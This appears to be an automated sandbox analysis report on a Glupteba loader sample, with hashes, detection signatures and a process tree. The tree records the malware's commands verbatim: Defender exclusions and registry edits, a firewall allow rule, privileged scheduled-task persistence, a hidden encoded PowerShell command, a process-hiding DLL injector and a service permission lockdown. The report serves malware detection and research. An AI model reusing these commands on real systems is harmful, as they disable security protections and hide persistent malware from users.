Resubmissions

04-02-2024 20:50

240204-zmv5ysadh5 10

17-12-2023 22:34

231217-2hhp6sgbaq 10

Analysis

  • max time kernel
    0s
  • max time network
    94s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04-02-2024 20:50

General

  • Target

    ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

  • Size

    735KB

  • MD5

    9f5cb3a9a4053a53063a9da9afbf6273

  • SHA1

    b1ad9fe9cd4e8ddf11909751a2e0334c86ff206e

  • SHA256

    ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1

  • SHA512

    aaa720bb50f26f0508f1a3403da7189e7915c5663f08b35dd35299bfb6815c3f20bfb143d35cb57a0a95f623505809434ec28ecb7b90374e674a40381c079b26

  • SSDEEP

    12288:xYRY4kQvFK/hSB8W5yWz2izHvqIknzbUtaD0Drt+/wQVbAV:/48SB8W5lzfqIknzCaoDWwWA

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 11 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • UPX packed file 16 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 61 IoCs
  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
    "C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe"
    1⤵
    • Windows security bypass
    • Windows security modification
    PID:32
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe" -Force
      2⤵
        PID:5076
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        2⤵
          PID:4040
          • C:\Users\Admin\Pictures\iuxQ7NUhr1jqmj2luX0GHzhp.exe
            "C:\Users\Admin\Pictures\iuxQ7NUhr1jqmj2luX0GHzhp.exe"
            3⤵
              PID:1668
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 392
                4⤵
                • Program crash
                PID:4748
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 368
                4⤵
                • Program crash
                PID:1276
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 588
                4⤵
                • Program crash
                PID:4448
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 664
                4⤵
                • Program crash
                PID:4412
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 408
                4⤵
                • Program crash
                PID:3128
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 708
                4⤵
                • Program crash
                PID:2476
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 744
                4⤵
                • Program crash
                PID:832
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 724
                4⤵
                • Program crash
                PID:956
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 800
                4⤵
                • Program crash
                PID:3244
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 788
                4⤵
                • Program crash
                PID:1396
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 800
                4⤵
                • Program crash
                PID:1476
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 796
                4⤵
                • Program crash
                PID:1124
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 848
                4⤵
                • Program crash
                PID:3360
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 764
                4⤵
                • Program crash
                PID:3944
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 724
                4⤵
                • Program crash
                PID:1516
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 628
                4⤵
                • Program crash
                PID:4504
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 868
                4⤵
                • Program crash
                PID:5016
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                4⤵
                  PID:4628
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 724
                  4⤵
                  • Program crash
                  PID:3356
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 784
                  4⤵
                  • Program crash
                  PID:3868
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 848
                  4⤵
                  • Program crash
                  PID:3320
              • C:\Users\Admin\Pictures\sgIOCBhuJzq7cR1GfGJBc2Mb.exe
                "C:\Users\Admin\Pictures\sgIOCBhuJzq7cR1GfGJBc2Mb.exe"
                3⤵
                  PID:3368
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 432
                    4⤵
                    • Program crash
                    PID:1080
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 616
                    4⤵
                    • Program crash
                    PID:2540
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 660
                    4⤵
                    • Program crash
                    PID:2340
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 696
                    4⤵
                    • Program crash
                    PID:4500
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 708
                    4⤵
                    • Program crash
                    PID:1908
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 532
                    4⤵
                    • Program crash
                    PID:1600
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 848
                    4⤵
                    • Program crash
                    PID:2400
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 772
                    4⤵
                    • Program crash
                    PID:2316
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 736
                    4⤵
                    • Program crash
                    PID:5092
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    4⤵
                      PID:3252
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 720
                      4⤵
                      • Program crash
                      PID:4688
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 856
                      4⤵
                      • Program crash
                      PID:376
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 796
                      4⤵
                      • Program crash
                      PID:4276
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 588
                      4⤵
                      • Program crash
                      PID:4216
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 372
                      4⤵
                      • Program crash
                      PID:3696
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 388
                      4⤵
                      • Program crash
                      PID:3864
                    • C:\Users\Admin\Pictures\sgIOCBhuJzq7cR1GfGJBc2Mb.exe
                      "C:\Users\Admin\Pictures\sgIOCBhuJzq7cR1GfGJBc2Mb.exe"
                      4⤵
                        PID:956
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 364
                          5⤵
                          • Program crash
                          PID:4692
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 588
                          5⤵
                          • Program crash
                          PID:2192
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 648
                          5⤵
                          • Program crash
                          PID:1080
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 668
                          5⤵
                          • Program crash
                          PID:380
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 576
                          5⤵
                          • Program crash
                          PID:3944
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 680
                          5⤵
                          • Program crash
                          PID:5020
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 508
                          5⤵
                          • Program crash
                          PID:4184
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          5⤵
                            PID:1572
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 392
                            5⤵
                            • Program crash
                            PID:1600
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 356
                            5⤵
                            • Program crash
                            PID:304
                          • C:\Windows\System32\cmd.exe
                            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                            5⤵
                              PID:3444
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              5⤵
                                PID:2428
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                5⤵
                                  PID:4232
                                • C:\Windows\rss\csrss.exe
                                  C:\Windows\rss\csrss.exe
                                  5⤵
                                    PID:3168
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 388
                                      6⤵
                                      • Program crash
                                      PID:396
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 408
                                      6⤵
                                      • Program crash
                                      PID:1304
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 632
                                      6⤵
                                      • Program crash
                                      PID:4908
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 668
                                      6⤵
                                      • Program crash
                                      PID:3808
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 756
                                      6⤵
                                      • Program crash
                                      PID:2420
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      6⤵
                                        PID:192
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 696
                                        6⤵
                                        • Program crash
                                        PID:3008
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 660
                                        6⤵
                                        • Program crash
                                        PID:4628
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 596
                                        6⤵
                                        • Program crash
                                        PID:5012
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 364
                                        6⤵
                                        • Program crash
                                        PID:1244
                                      • C:\Windows\SYSTEM32\schtasks.exe
                                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                        6⤵
                                        • Creates scheduled task(s)
                                        PID:1396
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 840
                                        6⤵
                                        • Program crash
                                        PID:2256
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        6⤵
                                          PID:756
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          schtasks /delete /tn ScheduledUpdate /f
                                          6⤵
                                            PID:32
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 916
                                            6⤵
                                            • Program crash
                                            PID:424
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            6⤵
                                              PID:4988
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 876
                                              6⤵
                                              • Program crash
                                              PID:3320
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 936
                                              6⤵
                                              • Program crash
                                              PID:4696
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 992
                                              6⤵
                                              • Program crash
                                              PID:2292
                                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                              6⤵
                                                PID:376
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 940
                                                6⤵
                                                • Program crash
                                                PID:4424
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 988
                                                6⤵
                                                • Program crash
                                                PID:4480
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                6⤵
                                                • Creates scheduled task(s)
                                                PID:1460
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 948
                                                6⤵
                                                • Program crash
                                                PID:3444
                                              • C:\Windows\windefender.exe
                                                "C:\Windows\windefender.exe"
                                                6⤵
                                                  PID:4772
                                          • C:\Users\Admin\Pictures\a8bEP3lbeh9VB4OADYVpjCCq.exe
                                            "C:\Users\Admin\Pictures\a8bEP3lbeh9VB4OADYVpjCCq.exe"
                                            3⤵
                                              PID:3200
                                            • C:\Users\Admin\Pictures\T5PNaOP1Fxd8itmrSjgHxdck.exe
                                              "C:\Users\Admin\Pictures\T5PNaOP1Fxd8itmrSjgHxdck.exe" /VERYSILENT
                                              3⤵
                                                PID:3464
                                                • C:\Users\Admin\AppData\Local\Temp\is-M1ORK.tmp\T5PNaOP1Fxd8itmrSjgHxdck.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-M1ORK.tmp\T5PNaOP1Fxd8itmrSjgHxdck.tmp" /SL5="$A01D2,831488,831488,C:\Users\Admin\Pictures\T5PNaOP1Fxd8itmrSjgHxdck.exe" /VERYSILENT
                                                  4⤵
                                                    PID:4924
                                                • C:\Users\Admin\Pictures\y4k72aw02l2rgonJhybNejgO.exe
                                                  "C:\Users\Admin\Pictures\y4k72aw02l2rgonJhybNejgO.exe" --silent --allusers=0
                                                  3⤵
                                                    PID:1776
                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050561\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050561\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
                                                      4⤵
                                                        PID:4208
                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050561\assistant\assistant_installer.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050561\assistant\assistant_installer.exe" --version
                                                        4⤵
                                                          PID:4276
                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050561\assistant\assistant_installer.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050561\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x11f2614,0x11f2620,0x11f262c
                                                            5⤵
                                                              PID:1244
                                                        • C:\Users\Admin\Pictures\uXBGiMoeSH1zgdAwDvA330P8.exe
                                                          "C:\Users\Admin\Pictures\uXBGiMoeSH1zgdAwDvA330P8.exe"
                                                          3⤵
                                                            PID:5016
                                                            • C:\Users\Admin\AppData\Local\Temp\7zSB46.tmp\Install.exe
                                                              .\Install.exe
                                                              4⤵
                                                                PID:4904
                                                                • C:\Users\Admin\AppData\Local\Temp\7zSD88.tmp\Install.exe
                                                                  .\Install.exe /JPdidKxawB "385118" /S
                                                                  5⤵
                                                                    PID:4244
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TN "gTALYMTyP" /SC once /ST 07:46:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                      6⤵
                                                                      • Creates scheduled task(s)
                                                                      PID:2052
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /run /I /tn "gTALYMTyP"
                                                                      6⤵
                                                                        PID:4724
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "bvgvHgqNgKCzXIKVFa" /SC once /ST 20:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\LmzpPZS.exe\" Lc /XFsite_idwha 385118 /S" /V1 /F
                                                                        6⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:3156
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /DELETE /F /TN "gTALYMTyP"
                                                                        6⤵
                                                                          PID:3008
                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\y4k72aw02l2rgonJhybNejgO.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\y4k72aw02l2rgonJhybNejgO.exe" --version
                                                                1⤵
                                                                  PID:4584
                                                                • C:\Users\Admin\Pictures\y4k72aw02l2rgonJhybNejgO.exe
                                                                  C:\Users\Admin\Pictures\y4k72aw02l2rgonJhybNejgO.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6d069558,0x6d069564,0x6d069570
                                                                  1⤵
                                                                    PID:3732
                                                                  • C:\Users\Admin\Pictures\y4k72aw02l2rgonJhybNejgO.exe
                                                                    "C:\Users\Admin\Pictures\y4k72aw02l2rgonJhybNejgO.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1776 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240204205056" --session-guid=b45a4323-a1fa-4be9-b650-7179c2321f93 --server-tracking-blob=ZWUwMzNmNDE0ODIxZmU2N2UwYzA5ODUyN2MzMThhM2JkZDQyMzM4ZmQ0ZTQ1NjNhNzVjOGU1MzJjZjIwZGM2ZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNzA3OTg1MC4zMDY0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJlZGM4MWRlNy1iZDcxLTQ3NjYtYmE2NS1lNDQ1ZDcwYmVhY2UifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4804000000000000
                                                                    1⤵
                                                                      PID:668
                                                                    • C:\Users\Admin\Pictures\y4k72aw02l2rgonJhybNejgO.exe
                                                                      C:\Users\Admin\Pictures\y4k72aw02l2rgonJhybNejgO.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6e879558,0x6e879564,0x6e879570
                                                                      1⤵
                                                                        PID:3872
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                        1⤵
                                                                          PID:4932
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                            2⤵
                                                                              PID:3392
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                            1⤵
                                                                              PID:4208
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                2⤵
                                                                                  PID:4456
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                1⤵
                                                                                  PID:4092
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                  1⤵
                                                                                    PID:4420
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                    1⤵
                                                                                      PID:804
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                      1⤵
                                                                                        PID:3012
                                                                                      • C:\Windows\system32\netsh.exe
                                                                                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                        1⤵
                                                                                        • Modifies Windows Firewall
                                                                                        PID:3868
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                        1⤵
                                                                                          PID:2328
                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                            2⤵
                                                                                              PID:2824
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                            1⤵
                                                                                              PID:1668
                                                                                            • \??\c:\windows\system32\gpscript.exe
                                                                                              gpscript.exe /RefreshSystemParam
                                                                                              1⤵
                                                                                                PID:3596
                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                1⤵
                                                                                                  PID:820
                                                                                                • C:\Windows\windefender.exe
                                                                                                  C:\Windows\windefender.exe
                                                                                                  1⤵
                                                                                                    PID:4312
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                                    1⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:808
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                                    1⤵
                                                                                                      PID:4464
